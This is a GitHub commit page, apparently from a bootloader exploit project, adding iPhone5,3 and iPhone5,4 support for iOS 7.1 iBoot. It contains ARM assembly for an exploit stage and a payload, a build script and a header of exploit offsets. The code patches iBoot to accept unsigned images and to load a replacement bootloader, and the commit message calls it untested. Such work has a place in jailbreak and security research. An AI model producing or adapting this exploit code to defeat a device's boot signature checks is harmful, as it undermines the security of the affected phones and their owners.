untested, but maybe it works?

kok3shidoll · Jun 28, 2023 · d42ccd0 · d42ccd0
1 parent cb3e8a2
commit d42ccd0
Show file tree

Hide file tree

Showing 9 changed files with 246 additions and 2 deletions.
diff --git a/exploit/README.md b/exploit/README.md
@@ -12,4 +12,6 @@
 | iPhone 5 [iPhone5,1] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/disk.dmg` |  
 | iPhone 5 [iPhone5,2] | 7.0 - 7.0.6 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` |  
 | iPhone 5 [iPhone5,2] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/disk.dmg` |  
+| iPhone 5 [iPhone5,3] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/disk.dmg` |  
+| iPhone 5 [iPhone5,4] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/disk.dmg` |  
 | iPad 4th [iPad3,5] | 7.0.4 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` |  
diff --git a/exploit/iBoot-1940.10.58/iPhone5,3/exploit b/exploit/iBoot-1940.10.58/iPhone5,3/exploit
diff --git a/exploit/iBoot-1940.10.58/iPhone5,3/src/asm/build.sh b/exploit/iBoot-1940.10.58/iPhone5,3/src/asm/build.sh
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+/opt/gnuarm/bin/arm-none-eabi-gcc -c iboot_p1.s
+/opt/gnuarm/bin/arm-none-eabi-objdump -D iboot_p1.o
+/opt/gnuarm/bin/arm-none-eabi-objcopy -O binary iboot_p1.o iboot_p1.bin
+rm iboot_p1.o
+
+/opt/gnuarm/bin/arm-none-eabi-gcc -c payload.s
+/opt/gnuarm/bin/arm-none-eabi-objdump -D payload.o
+/opt/gnuarm/bin/arm-none-eabi-objcopy -O binary payload.o payload.bin
+rm payload.o
diff --git a/exploit/iBoot-1940.10.58/iPhone5,3/src/asm/iboot_p1.s b/exploit/iBoot-1940.10.58/iPhone5,3/src/asm/iboot_p1.s
@@ -0,0 +1,123 @@
+@ iboot_p1.s
+@
+@ Copyright (c) 2021 - 2023 @ kok3shidoll
+@
+@
+
+
+    .text
+    .syntax    unified
+
+
+    .arm
+_entry:
+    b    _entry
+
+
+    .org    0x2144c
+    .thumb
+    .thumb_func
+_get_current_task:
+    bx    lr
+
+
+    .org    0x22e94
+    .thumb_func
+_arch_cpu_quiesce:
+    bx    lr
+
+
+    .org    0x25e90
+    .thumb
+    .thumb_func
+_decompress_lzss:
+    bx    lr
+
+
+    .org    0x34aec
+    .arm
+_bcopy:
+    bx    lr
+
+
+    .org    0x35548
+    .thumb
+    .thumb_func
+_disable_interrupts:
+    bx    lr
+
+
+    .org    0x488a0
+    .thumb
+    .thumb_func
+_iboot_patch:
+    ldr    r0, =0xbff488b2          @ end point of _iboot_patch()
+    ldr    r1, =0x84043f40          @ payload
+    movs   r2, #0x44                @ payload_sz
+    blx    _bcopy
+
+    ldr    r0, =0xc2c               @ main_task() ptr
+    ldr    r1, =(0xbff43f40 + 1)    @ payload_base
+    str    r1, [r4, r0]
+
+    b.n     _payload2
+
+
+    .org    0x48bb0
+    .global _payload
+    .thumb
+    .thumb_func
+_payload:
+    ldr    sp, =0xbfff8000
+    bl     _disable_interrupts
+    ldr    r4, =0x84000000
+
+    ldr    r0, =0xbff00000          @ could be 0, but we use explicit offset for iloader
+    mov    r1, r4
+    ldr    r2, =0x456c0
+    blx    _bcopy
+
+    b.n    _iboot_patch
+
+_payload2:
+    @ accept unsigned images
+    ldr    r0, =0x1b0d8
+    ldr    r1, =0x60182000
+    str    r1, [r4, r0]
+
+    bl     _get_current_task
+    movs   r1, #0
+    str    r1, [r0, #0x44]
+
+    ldr    r0, =0xbff49000          @ dst
+    movs   r1, #0xfc                @ dst_sz
+    ldr    r2, =0xbff48a7c          @ nettoyeur
+    movs   r3, #0xe1                @ nettoyeur_sz
+
+    mov    r5, r0
+    bl     _decompress_lzss
+    ldr    r0, =(0xbff01770 + 1)
+
+   @b.n    next
+_next:
+    blx    r0
+    bl     _arch_cpu_quiesce
+    blx    r5                       @ nettoyeur()
+    bx     r4
+
+
+.align    2
+
+
+    .org    0x48bf4
+    .long   0xe7ffdef0
+    .short  0xdef0
+
+next:
+    @blx   r0
+    @bl    _arch_cpu_quiesce
+    @blx   r5                       @ nettoyeur()
+    @bx    r4
+    nop
+
+.align    2
diff --git a/exploit/iBoot-1940.10.58/iPhone5,3/src/asm/payload.s b/exploit/iBoot-1940.10.58/iPhone5,3/src/asm/payload.s
@@ -0,0 +1,81 @@
+@ payload.s
+@
+@ Copyright (c) 2021 - 2023 @ kok3shidoll
+@
+@
+
+
+.set    JUMP_ADDRESS_PTR,   0xbff43fa0  @ end point of payload
+.set    IMAGE3_TYPE,        0x69626f62  @ 'ibob' : new iBoot TYPE
+
+
+    .text
+    .syntax unified
+
+    .arm
+_entry:
+    b   _entry
+
+
+    .org    0x844
+    .thumb
+    .thumb_func
+_find_boot_images:
+    bx    lr
+
+
+    .org    0x1f674
+    .thumb
+    .thumb_func
+_platform_init:
+    bx    lr
+
+
+    .org    0x20a74
+    .thumb
+    .thumb_func
+_prepare_and_jump:
+    bx    lr
+
+
+    .org    0x25e60
+    .thumb
+    .thumb_func
+_image_load_type:
+    bx    lr
+
+
+    .org    0x35548
+    .thumb
+    .thumb_func
+_disable_interrupts:
+    bx    lr
+
+
+    .org    0x43f40
+    .global _payload
+    .thumb
+    .thumb_func
+_payload:
+    ldr        sp, =0xbfff8000
+    bl         _disable_interrupts
+
+    bl         _platform_init
+    bl         _find_boot_images
+
+    ldr        r0, =JUMP_ADDRESS_PTR
+    adds       r1, r0, #0x4
+    mov.w      r2, #0x84000000
+    str        r2, [r0]
+    mov.w      r2, #0x100000
+    str        r2, [r1]
+    ldr        r2, =IMAGE3_TYPE
+    bl         _image_load_type         @ _image_load_type(*ptr, *sz, type)
+
+    movs       r0, #0x2                 @ BOOT_IBOOT
+    ldr        r1, =0x84000000          @ ptr
+    movs       r2, #0x0                 @ args
+    movs       r3, #0x0
+    bl         _prepare_and_jump        @ _prepare_and_jump(BOOT_IBOOT, jumpaddr, 0, 0)
+
+    nop
diff --git a/exploit/iBoot-1940.10.58/iPhone5,3/src/exploit_generic b/exploit/iBoot-1940.10.58/iPhone5,3/src/exploit_generic
diff --git a/exploit/iBoot-1940.10.58/iPhone5,3/src/header.h b/exploit/iBoot-1940.10.58/iPhone5,3/src/header.h
@@ -0,0 +1,26 @@
+/*
+ * header.h
+ * Copyright (c) 2021 - 2023 @ kok3shidoll
+ *
+ *
+ */
+
+/* iPhone5,3 - 11D257 [iBoot] */
+#define EXPLOIT_BASE                0x48bb0     // PC register obtained by exploit
+#define EXPLOIT_SECOND_BASE         0x48bfc     // Set second point to bypass overwriting by exploit
+#define EXPLOIT_SWAP_BASE           0x488a0     // Exploit area is small, so set points somewhere else
+
+/* iPhone5,3 - 11D257 [NewiBoot] */
+#define PAYLOAD_BASE                0x43f40     // main_task() configured for new iBoot
+#define PAYLOAD_BASE_SIZE           0x44        // sz
+
+/* iPhone5,3 - 11D257 [ramdisk] */
+#define RDSK_PD_BASE                0x85c
+#define RDSK_PD_SECOND_BASE         0x8a8
+#define RDSK_PD_SWAP_BASE           0x570
+
+/* payload setting */
+#define EXPLOIT_BASE_SIZE           0x40
+#define EXPLOIT_SECOND_BASE_SIZE    0x34
+#define EXPLOIT_SWAP_BASE_SIZE      0x12
+
diff --git a/exploit/iBoot-1940.10.58/iPhone5,4 b/exploit/iBoot-1940.10.58/iPhone5,4
@@ -0,0 +1 @@
+iPhone5,3
diff --git a/exploit/rdsk_maker/rdsk_maker.c b/exploit/rdsk_maker/rdsk_maker.c
@@ -77,12 +77,12 @@ int main(int argc, char **argv)
     /* iboot_p1 */
     LOG("reading iboot_p1");
     open_file(iboot_p1_path, &iboot_p1_sz, &iboot_p1);
-    assert(iboot_p1_sz <= 0x48000);
+    assert(iboot_p1_sz <= 0x49000);
 
     /* payload */
     LOG("reading payload");
     open_file(payload_path, &payload_sz, &payload);
-    assert(payload_sz <= 0x48000);
+    assert(payload_sz <= 0x49000);
 
 
     memcpy((ramdisk + RDSK_PD_BASE), (iboot_p1 + EXPLOIT_BASE), EXPLOIT_BASE_SIZE);